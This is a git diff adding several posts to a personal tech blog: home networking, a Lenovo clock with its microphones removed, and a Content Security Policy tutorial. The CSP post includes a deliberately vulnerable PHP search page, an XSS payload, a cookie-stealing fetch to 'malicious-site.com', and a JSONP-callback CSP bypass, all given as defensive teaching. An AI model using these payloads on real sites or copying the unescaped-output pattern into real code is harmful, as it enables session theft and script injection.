diff --git a/Makefile b/Makefile index da9f321..d6c3b9a 100644 --- a/Makefile +++ b/Makefile @@ -65,6 +65,10 @@ public/%/index.html: content/%.md tmp/templates/taglist.html mkdir -p $(@D) pandoc --template=templates/blog.html -f markdown -t html5 -M comments $< > $@ +public/startpage/index.html: templates/startpage.html + mkdir -p $(@D) + cp $< $@ + public/blog/%/index.gmi: content/blog/*-%.md mkdir -p $(@D) echo -n "# " > $@ @@ -72,7 +76,14 @@ public/blog/%/index.gmi: content/blog/*-%.md echo "" >> $@ md2gemini -f -l paragraph $< >> $@ -public/card: +public/%/index.gmi: content/%.md + mkdir -p $(@D) + echo -n "# " > $@ + grep 'title: ' $< | cut -d ' ' -f 2- >> $@ + echo "" >> $@ + md2gemini -f -l paragraph $< >> $@ + +public/card: content/card.curl content/card.curl > $@ ########### @@ -83,9 +94,9 @@ tags: $(foreach tag, $(ALLTAGS), public/tag/$(shell echo $(tag) | tr 'A-Z' 'a-z' blogs: $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.html ) $(foreach blog, $(ALLBLOGS), public/blog/$(shell echo $(blog) | tr 'A-Z' 'a-z')/index.gmi ) -standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html ) +standalone: $(foreach page, $(STANDALONE), public/$(page)/index.html public/$(page)/index.gmi ) public/startpage/index.html -all: tags blogs standalone public/index.html public/feed.rss public/card +all: tags blogs standalone public/index.html public/index.gmi public/feed.rss public/card push-blog: rsync -azvhP ./public/ generalPurpose:docker/jonathanh/public diff --git a/assets/css/main.less b/assets/css/main.less index 8c28455..040e4f4 100644 --- a/assets/css/main.less +++ b/assets/css/main.less @@ -107,6 +107,9 @@ main{ max-width: 95%; @media (min-width: 50em){ max-width: 70%; + &.wide{ + max-width: 95%; + } } } @@ -132,16 +135,34 @@ li{ // overflow: auto; //} +.col-container{ + display: flex; + flex-direction: row; + flex-wrap: wrap; + h1{ + width: 100%; + } +} + article{ background-color: @gb-dm-bg1; margin: 1em; padding: 1em; border-radius: 1em; + width: 100%; + &.col{ + @media (min-width: 50em){ + width: 25%; + } + } } footer{ display: flex; - flex-direction: row; + flex-direction: column; + @media (min-width: 50em){ + flex-direction: row; + } justify-content: space-between; background-color: @gb-dm-bg3; padding: 0.5em; diff --git a/assets/lenovo-clock/microphone-board.jpg b/assets/lenovo-clock/microphone-board.jpg new file mode 100644 index 0000000..92bfda9 Binary files /dev/null and b/assets/lenovo-clock/microphone-board.jpg differ diff --git a/assets/lenovo-clock/screen-screws.jpg b/assets/lenovo-clock/screen-screws.jpg new file mode 100644 index 0000000..5678363 Binary files /dev/null and b/assets/lenovo-clock/screen-screws.jpg differ diff --git a/assets/lenovo-clock/screenshot.png b/assets/lenovo-clock/screenshot.png new file mode 100644 index 0000000..69074bc Binary files /dev/null and b/assets/lenovo-clock/screenshot.png differ diff --git a/assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg b/assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg new file mode 100644 index 0000000..42bcdf1 Binary files /dev/null and b/assets/van/24cf7a6dbc63425b9de9439f850e1897.jpg differ diff --git a/assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg b/assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg new file mode 100644 index 0000000..a80781a Binary files /dev/null and b/assets/van/68d3da94e7944b3ead7b0f400bd79909.jpg differ diff --git a/content/blog/017-why-cant-i-buy-a-dumb-tv.md b/content/blog/017-why-cant-i-buy-a-dumb-tv.md new file mode 100644 index 0000000..489bdd3 --- /dev/null +++ b/content/blog/017-why-cant-i-buy-a-dumb-tv.md @@ -0,0 +1,116 @@ +--- +title: Why can't I buy a dumb TV? +date: 2022-12-31 +tags: + - Privacy +description: Dumb TVs don't appear to be a thing anymore. I wonder why? +--- + +Our old TV is showing it's age a bit. It's an old Samsung. About 30" and 1080p. +It works fine, but certainly isn't what you'd call modern. I think it dates from +around 2010. + +I thought I'd look and see how much it would cost to replace it -- allowing me to +use it as a monitor. I spend the majority of my time in a terminal, I don't game +and as such 4k, high refresh rate, wide screen monitors are of little interest +to me. What is of interest to me is how many terminal windows I can tile and +still use. + +Anyway, I went to various sites and navigated to TVs. What I found surprised me +a little: no dumb TVs. None at all. There were smart, 4k 55" TVs for under £400, +but nothing without "smart features". + +Most people assume that if I don't like something, it's because of privacy +concerns or similar. While this is partly true for TVs, it's not my main +dislike. + +Smart TVs need to be maintained by the manufacturer when it is in their interest +not to do so. Think about software updates. Is Samsung / LG / Sony / Philips going to +be putting updates out for your TV in 10 or 15 years? If you think they might, +take a look at how phones have gone. I'll use Samsung as an example: they offer +3 years worth of feature updates and 4 years worth of security updates -- that is +for their flagships. Lower end phones won't even get that. This means that after +4 years, your Samsung flagship phone will not be patched for security issues. + +Why would they do any different for TVs? Many smart TVs even run Android -- a +variation on the system used on most smartphones. + +That just relates to the manufacturer maintaining the device. Let alone the apps +who can also [decide to stop supporting the TV](https://9to5google.com/2019/07/26/sony-tv-amazon-prime-video-september/). + +It is bad enough spending hundreds (or thousands) of pounds on a phone every few +years, I don't want to do the same for a TV. + +"What about apps?", you might ask. This is a non issue. I can buy a 4k fire +stick for less than £50. That is without offers. I've seen them sub-£30 on prime +day. If that only lasts 3 years, I can swap that for a new one at the time, +rather than swapping out my whole TV. I don't love the idea of replacing a set +top box every few years, but I like that idea far more than replacing a whole +TV. + +Modern versions of HDMI will happily support your HDR, single remote and +surround sound needs. + +So, planned obsolescence is one reason, but I don't think it is the whole story. + +I'm sure it won't come as a surprise to anyone reading this blog that data +collection is a huge business these days. Targeting advertising allows companies +to charge exuberant prices for well placed ads. The amount they can charge +correlates nicely with the amount of data they can collect. It is no coincidence +that the largest advertising companies (Google and ~~Facebook~~ Meta) are also +two of the worst offenders for hoarding information. + +TV manufacturers realised that they can make more money selling adverts than +they can selling TVs. The more TVs they sell, the more they can charge for +advertising. This is not just me and my tin foil hat. Vizio went public a year +or so ago and, as a result, had to publish their financials. They made over +[twice as much money selling ads as they made from TV sales](https://www.theverge.com/2021/11/10/22773073/vizio-acr-advertising-inscape-data-privacy-q3-2021). + +This isn't the post to go into why I think it is important to protect your data. +If you're reading my blog, you probably already have some idea. However, it +seems that just as most of our phones, smart speakers and watches spy on us, our +TVs are trying to do the same. Maybe you don't care if big companies know what +you're watching. That is your decision, but it is a decision you should make -- +not one that you should be compelled into. + +It seems clear to me that planned obsolescence isn't the only factor at play +here. Sure, they want to sell you a TV every few years, but they also want to +harvest as much data as possible in order to sell ads. I don't want this. + +The question then becomes, what can we do about it? Unfortunately, I haven't +found a good answer to this but here are some thoughts. + +The first, and perhaps most obvious answer, is to buy a smart TV and just not +connect it to the network. With this you get the advantage of (comparably) cheap +units, and don't have the risk of data harvesting. A slight variation on this +might be isolating the TV or blocking access via a firewall rule. This doesn't, +however, mitigate the issue of security updates. Additionally, I'm told that +many TVs will either not work at all, or continuously prompt you to connect them +to the internet. I recently tried to use a Fire TV stick on a network without +internet connectivity, in order to watch content stored on a local server with +Jellyfin. The process was a long way from ideal. The home screen (where you +would normally select the app such as Jellyfin) was replaced entirely with a +network error and a prompt to go to network settings. Even apps that don't +require an internet connection were unavailable. + +It was possible to launch Jellyfin by going `Settings` -> `Applications` -> +`Manage Installed Applications` -> `Jellyfin` -> `Launch Application`, but that +is not a process I want to make every time I turn on the TV, and certainly not a +solution that would get wife-approval. I have no idea if I would have similar +issues with other devices, and buying a smart TV to test that is not +particularly palatable. + +Another option might be using a non-tv monitor as a TV. You can buy large +computer monitors or displays meant for digital signage. Computer monitors of +this size [are +expensive](https://www.amazon.co.uk/Philips-558M1RY-Monitor-Ambiglow-FreeSync/dp/B086X4J9KG/ref=sr_1_3?keywords=65+inch+monitor+4k&qid=1672490924&sprefix=65+inch+monitor%2Caps%2C292&sr=8-3). +Digital signage signs are also expensive, but do tend to come with the advantage +that they are designed to be on all the time. Although I couldn't find much in +the way of data, I suspect this would mean they would last longer. However, +again, they are a lot more expensive than a consumer-grade smart TV. + +My plan is to do some more research and try and find a smart tv that can be used +without constant nags when not connected to the internet. If any of you know of +such a device, or have any other ideas, let me know in the comments below. + + diff --git a/content/blog/018-i-got-a-robot-vacuum.md b/content/blog/018-i-got-a-robot-vacuum.md new file mode 100644 index 0000000..2703c01 --- /dev/null +++ b/content/blog/018-i-got-a-robot-vacuum.md @@ -0,0 +1,71 @@ +--- +title: I Got a Robot Vacuum +date: 2022-12-31 +tags: + - Privacy + - Home Assistant +description: I recently bought a Robot vacuum. I have been amazed how good it is. +--- + +So, you have probably seen or heard about robot vacuums. I had, although +honestly thought they were a bit of a gimmick. However, a few people I know have +them and sung their praises so I thought I'd see what the fuss was about. + +I did some research and settled on the [Dreame L10 Pro](https://amzn.to/3GacxLz) +([Non-Associates +link](https://www.amazon.co.uk/Dreame-Dual-Line-Navigation-Multi-Level-Compatible/dp/B09YQ3VF3J/?th=1)). +This was in no small part because it is known to work with +[Valetudo](https://valetudo.cloud/) which allows for fully local control of the +robot. As well as a very usable web interface, it also provides MQTT control +which I use for [Home Assistant](/tag/home_assistant/) control. + +It is fair to say that my expectations have been shattered by this device. I +expected it to do a reasonable job, but that I would probably have to do a +"proper" hoover once a week or so. That has not been the case. I have not had to +manually hoover the floors at all since setting it up. I have been especially +surprised by this as we have a dog who malts. + +I have the vacuum set to vacuum our daytime living areas (lounge, kitchen, hall, +study) every morning at 1am. I did not expect the quality of life improvement +that we got from waking up every morning to a vacuumed house. Our bedroom is +then vacuumed during the day while we work. Apart from emptying the vacuum's +dustbin, this is entirely automatic. + +The vacuum I have has a detachable cloth and water tank that it can drag behind +it and keep wet. I mostly got the device for its vacuum capabilities. However, +the addition of the mop is nice. This, too, exceeded my expectations; although +not to the same extent as the vacuum. It is nice to have, but I wouldn't buy +this particular robot for its mopping capabilities. We tend to attach this mop +and manually instruct the vacuum to mop various rooms when we go out. + +## Any Cons? + +Although this device has been an overwhelming positive in our life, it may not +be for everyone. + +We have hard floors throughout our flat. This obviously makes vacuuming and +mopping easier for the robot. We do have a thick rug which it can struggle with +a little. However, I have taken the robot to our parents' houses who have carpet +and it has tackled even quite thick carpets without issue. If you have a lot of +very thick rugs, you may want to do a bit more research into robots that can +deal with them. + +Also, the dustbin in the vacuum is quite small. I tend to empty it every other +day. Paying more can get you features such as auto-emptying dustbins which the +robot I got doesn't have. + +We live in a flat, so we don't have stairs to contend with. We are due to move +very soon into a house. My long term plan is to buy a second robot, in order to +have one up stairs and one downstairs. This (obviously) makes a fully automated +vacuuming setup significantly more expensive. However, the fact that I am +planning this hopefully demonstrates how happy I am with this vacuum. + +## Home Assistant + +As mentioned, Valetudo allows me to control my robot entirely locally. My home +automation platform of choice is Home Assistant which is [supported by +Valetudo](https://valetudo.cloud/pages/integrations/home-assistant-integration.html). + +With my smart light switches, it allows me to do things like push and hold the +light switch in order to instruct the vacuum to come and hoover the room I'm in. +It can also stop the vacuum from vacuuming every day while we are on holiday. diff --git a/content/blog/019-my-new-home-network.md b/content/blog/019-my-new-home-network.md new file mode 100644 index 0000000..d416754 --- /dev/null +++ b/content/blog/019-my-new-home-network.md @@ -0,0 +1,162 @@ +--- +title: My New Home - Network +date: 2023-02-08 +tags: + - Privacy + - My New Home +description: > + I recently bought a new House. In this post, I discuss my network setup as + part of a series of posts about the setup. +--- + +So, we have finally moved into our new home. The buying process took far too +long, I am sick to death of dealing with solicitors, but we are now in. I hope +this will become a series of blog posts in which I detail the setup process. +This particular post will be the network. + +My initial intention had been to buy some land and build a house. However, the +process of doing so in the UK was ... annoying, so instead we went for a new +build. We found the property early enough in the build process that we were able +to make various requests. One of which was for the electrician to run Cat-6 +ethernet cable throughout the house before the walls were plastered. The cables +all run into our under-stairs cupboard which I managed to convince my wife to +give me as a server room. + +The majority of our rooms have 2 ethernet sockets in opposite corners. Our +lounge has 4, one in each corner. Our hall and landing both have celling mounted +ports for access points. I think this is probably more than we need, but at the +time we didn't know how we'd lay the rooms out, so we put in more than we +thought we'd need. I think this was a good choice. Running ethernet is much +easier when you don't have plaster to contend with. And they are just sockets on +the walls -- they are no uglier than mains, telephone or coax sockets. + +## Network Gear + +In terms of the network gear, I decided to take the plunge and try TP-Links +Omada line. I think it is fair to say that in the pro-sumer arena, Ubiquity are +the most popular. However, they are also expensive. I watched a lot of YouTube +and decided that TP Link's product catered for my needs. + +I bought: + +* [A Router / firewall](https://amzn.to/3HwPACO) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08SWR1K56/)) +* [A Switch](https://amzn.to/3I1rB07) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B08W4PM24H/)) +* [An Access Point](https://amzn.to/3RCFkxw) ([Non-Associates Link](https://www.amazon.co.uk/gp/product/B09ZF7HPFB/)) + +I won't go into too much detail on the individual devices I got as copying me is +a pretty bad idea. You want to make the decision based on the size of your +network, the speeds you need and the sorts of devices you want to attach. + +## Network Configuration + +I run the TP Link Omada Controller in a Docker container on my home server. I +have had no issues with it at all so far. + +In terms of the software itself, I would say that it's not quite on a par with +Ubiquity's product, however, it is more than sufficient for my needs and I would +think more than sufficient for most home users and small / medium businesses. + +The only area I found it to be a little lacking was the firewall configuration. +However, before I explain that, it would be helpful for me to explain the VLANs +I have on my network. In case you don't know, a VLAN is a virtual network. It is +useful for categorising and segregating devices. I have seen many examples +across the internet of people who setup tens of VLANs for their home network. +However, I think any security gains you may get from that are outweighed by the +added complexity maintaining it. I have opted for two VLANs. + +My first VLAN is for trusted devices. Trusted devices are my computers, my +wife's computers, our phones and my server. These are able to communicate +with each other and the internet. + +My second VLAN is for smart devices. These are devices that have no business +talking to each other or the internet. The only device they can communicate with +is my server running Home Assistant, an NTP server and a DNS server. + +This can all be achieved easily with the Omada software. Where it is lacking is +in its inability to set up stateful firewall rules. I would like to configure +the firewall so that devices on my trusted network can communicate with devices +on the smart VLAN, and the smart devices should be able to reply. Meaning, from +my laptop, I cannot SSH into [my vacuum](/blog/i-got-a-robot-vacuum/) because +that requires 2 way communication. There is talk [on +Reddit](https://libreddit.kavin.rocks/r/HomeNetworking/comments/mrxsbg/tplink_omada_switch_acls_arent_stateful/) +that future firmware may support this, but at the moment it doesn't. I have got +around this by using my server as a jump box to SSH from as smart devices are +able to connect to this, although I'd prefer a stateful firewall solution. + +I am also not able to force all DNS requests to my DNS server. On some router / +firewall solutions, you can force all outbound traffic on port 53 (DNS) to a +particular device. I have to rely on devices honouring the server specified via +DHCP. However, they seem to be doing this. They are unable to communicate with +any other servers so even if they are only honouring my choices because they +have no choice, I don't really care. + +## NTP + +One of the issues I overlooked when planning my network setup was that of the +Network Time Protocol (NTP). I have Chrony running on my server, but many +devices don't allow you to specify an NTP server. Instead, they just silently +fail, and leave you scratching your head whilst trying to correlate times in log +files. A particularly annoying case of this had a device default to a date in +January 2022. Whilst debugging an issue, it was January 2023 and I completely +missed the fact that it was a year out for far too long. + +It should be possible to configure an NTP server via DHCP. However, the Omada +software doesn't [appear to support +it](https://community.tp-link.com/en/business/forum/topic/256680). Eventually, I +might allow my Pi Hole to manage IP assignment which would allow me to configure +the appropriate DHCP options, although that would still be reliant on devices +obeying it. + +For now, I have pointed the domains I saw being used at my server, which appears +to have worked. + +## Network Connection + +Another issue I came across is that some mobile apps for self hosted programs +don't work without an internet connection. I [raised an +issue](https://github.com/advplyr/audiobookshelf-app/issues/566) for +Audiobookshelf. The owner responded quickly and after a few screenshots +acknowledged the bug. This is not supposed to be a knock on the app -- I have +been hugely impressed by the speed of responses I've had from the team who work +on it. It is instead supposed to highlight the fact that many tools are not +tested against the sort of non-standard setup I have here. As a result, I am +going to run into issues that I wasn't expecting. + +In the case of Audiobookshelf, it looks like one of its libraries checks for +internet connectivity rather than network connectivity. After checking my +pihole's logs, it turns out that Android devices make regular (unencrypted) +requests to . This is used to identify +captive portals as well as verify internet connectivity. Fortunately for me, +being unencrypted, I can host a simple webserver and point that domain at it on +my network. So that's what I did. The relevant NGINX config is below: + +```nginx +server { + listen 80; + listen [::]:80; + + server_name connectivitycheck.gstatic.com; + + location / { + return 204; + } +} +``` + +After this, the app started working as expected. + +## WPS + +WPS is a method of connecting to a network without having to enter a password. +It generally involves pushing a button on your access point and a button on your +phone / device then "magically" the device is on your network. This method of +connection has been shown to have several security weaknesses. Many modern +solutions, including Omada and Ubiquiti have stopped providing this as an +option. + +I approve of this decision, it is something I would have disabled if it had been +present. However, my printer has no other way of connecting to the network. No +ethernet and no way to enter a password. I think I'll probably have to dig out +an old router that does support WPS and hope that after connecting, the printer +will have a web interface that allows me to change the network configuration. If +not, I may have to just plug a small SBC into it and run a cups server on that. diff --git a/content/blog/020-my-new-home-alarm-clock.md b/content/blog/020-my-new-home-alarm-clock.md new file mode 100644 index 0000000..dbd7a73 --- /dev/null +++ b/content/blog/020-my-new-home-alarm-clock.md @@ -0,0 +1,209 @@ +--- +title: My New Home - Alarm Clock +date: 2023-02-26 +tags: + - Privacy + - My New Home + - Home Assistant +description: > + Part 2 of my new home setup. I discuss a Lenovo clock I got. +--- + +I recently picked up a [Lenovo Clock +2](https://www.lenovo.com/gb/en/p/smart-devices/smart-home/smart-home-series/lenovo-smart-clock-2/wmd00000485) +on offer. I got it for around £25. I knew it ran Android and thought +that for that price, it was worth picking one up to mess with. + +After a couple of searches, I found a guide to installing other android apps on +it. + + + +Once I'd installed a custom launcher, I was able to get into the android +settings and start disabling apps. I disabled the vast majority of them although +I was unable to disable the Google Assistant app. At the time of writing, there +doesn't appear to be a reliable root method for the device. There is also no USB +interface so even an adb shell was unachievable. + +## Dealing with the microphones + +For me to have a device like this plugged in, in my house, I want to be +absolutely certain that it isn't sending any data back to its Google mothership. + +The device has a toggle on the back that switches the microphone off. This is a +software toggle. This has 2 issues. Firstly, it could conceivably be overwritten +in software. Second, it puts an icon on the screen to tell you that it's muted. +This takes up a significant part of an already small screen. So, I took the +device apart to see if the microphones were removable. + +I should probably make the point here that the following procedure will void any +warranties you may have on the device. Also, this is not advice, I am not +responsible if you break it, or hurt yourself or anything else. + +Disassembly was surprisingly easy. After unsticking the non-slip +ring on the bottom, there were four screws to undo -- one in each corner. After +doing this, the bottom of the device can be prized off. There are a few plastic +clips and a ribbon cable to be aware of, but if you have ever disasembed +anything before, it should be quite easy. + +![Bottom off, screen screws circled](/assets/lenovo-clock/screen-screws.jpg) + +This then exposes a couple of additional screws which hold the screen in place, +highlighted above. The screen can then be removed, exposing a circuit board +containing the microphones and the ambient light sensor. + +![Screen removed, microphones exposed](/assets/lenovo-clock/microphone-board.jpg) + +This can be removed. It is friction fit and there is another ribbon cable. +Remove the ribbon cable and the microphones and sensor can be removed. Put +everything back together and plug it in - there you go. You have a device that +**cannot** listen to you. + +This may be overkill, this device is going on a VLAN that doesn't have internet +access so there should be no way for it to talk back anyway. However, defence in +depth is the best option in my opinion. If I connect it to the wrong network or +misconfigure my firewall, I don't want it sending any information back to +anyone. + +## Home Assistant Setup + +Next step, for me, was to set it up as a Home Assistant screen. I was able to +install [WallPanel](https://github.com/thecowan/wallpanel-android) which is a +browser that can be controlled remotely via an HTTP API or MQTT. It is similar +to the concept of [FullyKioskBrowser](https://www.fully-kiosk.com/). It is open +source though and doesn't lock features behind a paywall. I've used +FullyKioskBrowser before, and it is a very competent piece of software, but I +felt like trying something new. + +I created a simple dashboard in Home Assistant, and set the start URL for +wallpanel to that dashboard. The screen is small, so you don't really want lots +of information on there. I have a clock, an alarm clock toggle, a radio +station selection (more on that later) and a few buttons. + +The next part of the setup was [Browser +Mod](https://github.com/thomasloven/hass-browser_mod). This allows you to +control a browser window through Home Assistant, adding the ability to use it as +a media player or hide the navigation elements that are usually present. This +allowed me to play (local) audio on the clock. It also allows me to remove the +sidebar and top bar on the device to reclaim a little screen space. + +### Radio + +One of the side effects of not allowing the clock to access the internet means +it can't play internet radio (hopefully that isn't a surprise to anyone). +However, I like to be woken up to the radio. It is probably possible to add some +radio IP addresses to a whitelist. However, to make my life easier, I decided to +proxy any radio stations through my home server, which does have internet +access and the smart clock can communicate with. + +For the most part this was pretty simple. I found stream URLs for a couple of +radio stations. Here is the nginx configuration for Classic FM and Absolute +Radio. + +```nginx +perl_set $unix_timestamp 'sub { + time(); +}'; + +server { + listen 443 ssl; + listen [::]:443 ssl; + + ssl_certificate /etc/nginx/certs/fullchain1.pem; + ssl_certificate_key /etc/nginx/certs/privkey1.pem; + + server_name radio.my.domain + include /etc/nginx/conf.d/acl.inc; + + location /classicfm { + proxy_pass http://icecast.thisisdax.com/ClassicFMMP3; + } + + location /absolute { + resolver 1.1.1.1; + proxy_pass http://edge-bauerabsolute-05-gos2.sharp-stream.com/absoluteradiohigh.aac?aw_0_1st.skey=${unix_timestamp}&aw_0_1st.playerid=BMUK_RPi; + } +} +``` + +I'm sure you can see how this can be extended for more stations. The only thing +that may not be obvious is the `unix_timestamp` variable in the absolute radio +url. I don't know why it is necessary, but for some reason it is, so I define a +variable in the `perl_set` block at the top. + +So, with this, I can run + +```bash +mpv https://radio.my.domain/classicfm +``` + +And ClassicFM will play. With BrowserMod set up for the device, I can then run +the service: + +```yaml +service: media_player.play_media +target: + entity_id: media_player.alarm_clock +data: + media_content_type: music + media_content_id: "https://radio.my.domain/classicfm" +``` + +I would like to be able to add these URLs to the media library, however I +haven't yet found a way to do that. If anyone knows of a way, please let me +know. However, for now I created a text helper with the following: + +* Off +* Absolute Radio +* Classic FM + +I then created an automation: + +```yaml +- alias: Clock Radio + trigger: + - platform: state + entity_id: + - input_select.bedroom_radio + condition: [] + action: + - if: + - condition: state + entity_id: input_select.radio + state: Classic FM + then: + - service: media_player.play_media + data: + media_content_id: https://radio.hodgson.one/classicfm + media_content_type: music + target: + entity_id: media_player.alarm_clock + - if: + - condition: state + entity_id: input_select.radio + state: Absolute Radio + then: + - service: media_player.play_media + data: + media_content_id: https://radio.hodgson.one/absolute + media_content_type: music + target: + entity_id: media_player.alarm_clock + - if: + - condition: state + entity_id: input_select.radio + state: 'Off' + then: + - service: media_player.media_stop + data: {} + target: + entity_id: media_player.alarm_clock + mode: single +``` + +The last step is an automation for my alarm clock. It simply sets the input +select we set up to ClassicFM. This then plays on the speaker. + +The result is below: + +![Finished Clock](../../assets/lenovo-clock/screenshot.png) diff --git a/content/blog/021-csp.md b/content/blog/021-csp.md new file mode 100644 index 0000000..b52700d --- /dev/null +++ b/content/blog/021-csp.md @@ -0,0 +1,360 @@ +--- +title: Setting a good Content Security Policy +date: 2024-08-22 +tags: + - Security + - Websites +description: > + Setting a good CSP can be hard. Here I go through what it is, and how to set + it up well. +--- + +The Content Security Policy (CSP) is a powerful security feature that helps +protect your website from cross-site scripting (XSS) attacks and other types of +code injection vulnerabilities. There are some directives that do other things, +but the bulk of this blog post will cover using the `fetch-directives`, or the +elements of the CSP that allow you to specify a allow-list of approved sources +from which resources This helps prevent malicious code from being executed on +your site. + +To implement CSP, you need to set the Content-Security-Policy HTTP header on +your web server. Here's an example of what a basic CSP header might look like: + +``` +Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com +``` + +Let's break down the different directives in this example: + +- `default-src 'self'`: This sets the default source for all resource types to the same origin (i.e., your own website). This is a good baseline to start with. +- `script-src 'self' https://example.com`: This specifies that scripts can only be loaded from your own site (`'self'`) and the `https://example.com` domain. This helps prevent the execution of any unauthorized scripts. + +It is worth noting that default-src applies to all source types that haven't +been explicitly specified. Any sources that are explicitly specified overwrite +then default-src, they are not added to it. + +Consider the following: + +``` +Content-Security-Policy: default-src 'self'; script-src https://example.com +``` + +This will not allow scripts to sourced from the current origin, despite `'self'` +being in the `default-src` directive. + +You can further customize the CSP header to suit your website's specific needs. +For example, you might want to allow images to be loaded from a content delivery +network (CDN), or allow fonts from a third-party font provider. Here's an +example of a more comprehensive CSP header: + +``` +Content-Security-Policy: default-src 'self'; script-src 'self' https://example.com; style-src 'self' https://cdn.example.com; img-src 'self' https://cdn.example.com; font-src 'self' https://fonts.gstatic.com +``` + +In this example, we've added directives for styles, images, and fonts, allowing +them to be loaded from specific approved sources. + +It's important to note that implementing CSP is an iterative process. You'll +likely need to adjust your policy as you add new features and functionality to +your website. A good approach is to start with a strict policy and gradually +loosen it as needed, while keeping security as the top priority. + +Whilst testing, it may be useful to use the +[content-security-policy-report-only](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy-Report-Only) +header. Whilst it doesn't provide any protection, it also won't break an +existing site as it only reports report violations, rather than blocking them. + +## Why Bother + +So, we have an idea of how to set a CSP, but not why we may want to. The main +reason to have a strong CSP set is to protect against injection attacks. The +most common of these is cross-site-scripting, where JavaScript is injected; +although other types do exist when injecting malicious css (style-injection), or +images (image-injection). The example below explains one way in which script +injection, or cross-site-scripting, is bad. + +Take the following simple PHP search page: + +```php + + + + Vulnerable Search Page + + +

Search Our Website

+
+ Search: + +
+ + You searched for: " . $_GET['search'] . ""; + } + + //Some logic to display search results + ?> + + +``` + +The important factor here is that the users search query (`$_GET['search']`) is +output verbatim, without encoding or sanitising it. + +If I perform a search for ``, the following h2 tag will be sent to the browser: + +``` +

You searched for:

+``` + +The browser will see that, and interpret the script tag as a script it should +execute. `alert(1)` is a relatively benign function that we often use to +demonstrate the issue exists, without causing significant issues to the site. +However, now imagine changing `alert(1)` for +`fetch('https://malicious-site.com?c=' + document.cookie)`. + +Now my cookies have been sent to a malicious site for the owner to do with as +they please. + +The content-security-policy can be use to add a layer of protection here. When +set strictly, the browser can "know" that the script tag in the h1 tag isn't on +a pre-approved list, so the browser won't execute it. + +## Potential Mistakes + +So, now we know why you might want a CSP, and how to set one, we'll look at some +of the most common mistakes I see people make. + +### `'unsafe-inline'` source + +This source is very frequently added to a CSP, without realising it severely +limits the protection that it can offer. Most online generators will add it as, +in their current setup, most sites use inline resources. An inline resource is, +as the name suggests, most script or style resources that are not external. + +So, + +```html + + + + + + + +``` + +The problem here is that, more often than not, inline JS is the easiest way to +achieve XSS. The search example we used earlier added an inline script tag, so +a CSP with unsafe-inline would not have prevented it from executing. + +There are a number of better options here. First is externalising scripts. So, +moving inline JS into an external file and adding it to the allow-list. + +If that isn't possible, or practical, another option is to use the special +`-` sources, or `nonce-` sources. These allow you to add +specific inline scripts to the allow-list, without allowing all inline scripts. +Just make sure not to fall into the [potential mistakes with nonce +sources](#nonce-source). + +### `'unsafe-eval'` source + +The unsafe-eval source is only relevant for JavaScript, and allows scripts to +run `eval()`, and a couple of other similar functions. The most common use for +eval I've seen is when targeting older JS environments that not have native +JSON support as an alternative to `JSON.parse()`. + +So, consider the following: + +```js +const jsonString = document.getElementById('someTextArea').value; +const jsonObject = eval(jsonString2 ); +``` + +If the contents of the text area were: + +```json +{ + "name": "Jane Doe", + "age": 25 +} +``` + +then: + +``` +console.log(jsonObject.name); // Output: "Jane Doe" +``` + +However, if the contents of the text area were `alert(1)`, then we are in the +situation again whereby unsafe JavaScript is being executed. Unfortunately, +there are a lot of different uses of eval, so a "fix" for all of them is +unlikely. However, most modern frameworks do not need to use eval, so disabling +it is preferable if possible. + +### Nonce source + +The nonce source allows site maintainers to allow some inline sources to be +included. We've been using JavaScript as examples, so I will continue to do so, +but note that this is also relevant for CSS. + +``` +Content-Security-Policy: script-src 'nonce-uph5Fai4' +``` + +``` + + + + Example + + + + +

Our Website

+ + +``` + +For the nonce source to be effective, it must be unpractical for malicious actor +to guess the nonce. In practice, this generally means using a long and random +string of characters for each response. The nonce should not be re-used. If a +malicious actor can guess what a nonce is, then they can simply add the +attribute to their injected payload. + +### JSONP Sources + +JSONP (JSON with Padding) is a technique used to bypass the same-origin policy, +which is a security feature implemented by web browsers to prevent a web page +from making requests to a different domain than the one that served the web +page. + +The way JSONP works is as follows: + +1. The client-side code defines a function, to processes JSON data. +1. A ` + +``` + +The response to that data script would look something like: + +```javascript +handleResponse({ + "name": "John Doe", + "age": 30 +}); +``` + +JSONP was a popular technique in the past, as it allowed developers to make +cross-domain requests without running into the same-origin policy. + +However, if a user is able to inject a script tag into a document, and a CDN +that is known to host JSONP endpoints is on the allow-list, they could include +something like + +```html + +``` + +Most implementations will then return the following: + +```javascript +alert(1);handleResponse({ + "name": "John Doe", + "age": 30 +}); +``` + +JSONP is now generally discouraged, in favour of +[CORS](https://jakearchibald.com/2021/cors/), which allows site owners to +explicitly allow some resources to be requested across origins. However, note +that many CDNs host JSONP endpoints, so even if your site doesn't use them, +allowing a domain that hosts them is enough to provide a CSP bypass in many +situations. The CSP does allow sub directories or even specific files to be +added to the allow-list, so if unsure about whether a CDN provides JSONP +endpoints, you may wish to explicitly allow a specific file on the CDN, rather +than all files. + +For example: + +``` +Content-Security-Policy: script-src http://example.com/file.js; +``` + +as opposed to + +``` +Content-Security-Policy: script-src http://example.com/; +``` + +### Domains Which Allow Uploads + +When you include a domain in your CSP, you're essentially giving control of your +website's security to that platform and all the developers who publish code on +it. Not only does this potentially introduce [supply chain +attacks](https://thehackernews.com/2024/07/polyfillio-attack-impacts-over-380000.html), +many CDNs also allow public submission. Unpkg, for instance, is a popular CDN +that hosts everything on NPM. All you need to submit code to it is a free NPM +account. If a CSP includes unpkg, or one of the many similar services, in their +CSP; anyone can submit code that the CSP will allow to run. + +#### Self source + +It is worth noting that the `'self'` keyword can introduce a similar issue. + +The `'self'` source is a shortcut to allow sources from +the current [origin](https://developer.mozilla.org/en-US/docs/Glossary/Origin). + +The difference between origin and site has been discussed [elsewhere in more +detail](https://jakearchibald.com/2021/cors/#origins-vs-sites), but briefly, an +origin is defined by scheme (protocol), hostname (domain), and port of the url. +Sub domains are a different origin, although often the same same site. + +``` +https://example.jonathanh.co.uk:443/something/cool +│ │ +└────────────Origin───────────────┘ + +https://example.jonathanh.co.uk:443/something/cool + │ │ + └────Site─────┘ +``` + 